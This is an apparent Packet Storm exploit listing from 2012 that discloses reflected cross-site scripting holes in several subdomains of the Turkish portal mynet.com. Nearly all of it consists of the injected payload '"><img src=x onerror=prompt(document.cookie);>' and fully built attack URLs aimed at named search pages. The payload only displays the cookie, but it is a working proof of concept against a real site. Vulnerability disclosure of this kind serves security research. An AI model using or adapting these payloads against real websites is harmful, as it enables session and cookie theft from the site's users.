Mynet.com Cross Site Scripting

2012-08-10T00:00:00
ID PACKETSTORM:115477
Type packetstorm
Reporter TayfunBasoglu
Modified 2012-08-10T00:00:00

Description

                                        
```
# Exploit Title: Mynet XSS (ALL)
# Date: 10.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php

----------------
http://cevaplar.mynet.com/ search box
http://cevaplar.mynet.com/Search.aspx?q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
"><img src=x onerror=prompt(document.cookie);>
----------------
http://arama.mynet.com // search box
"><img src=x onerror=prompt(document.cookie);>
http://arama.mynet.com/web/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/1/?cx=partner-pub-5464020032963120%3Aww4q6j-259k&cof=FORID%3A10&ie=UTF-8&q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
----------------
http://foto.aktuel.mynet.com
"><img src=x onerror=prompt(document.cookie);>
http://foto.aktuel.mynet.com/dak/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/
----------------
http://birbak.mynet.com/
"><img src=x onerror=prompt(document.cookie);>
http://birbak.mynet.com/arama/%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
----------------
http://sinema.mynet.com/
"><img src=x onerror=prompt(document.cookie);>
http://sinema.mynet.com/arama/film,%20oyuncu,%20i%C3%A7erik,%20sinema%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
----------------
http://tatil.mynet.com/ search box
"><img src=x onerror=prompt(document.cookie);>
```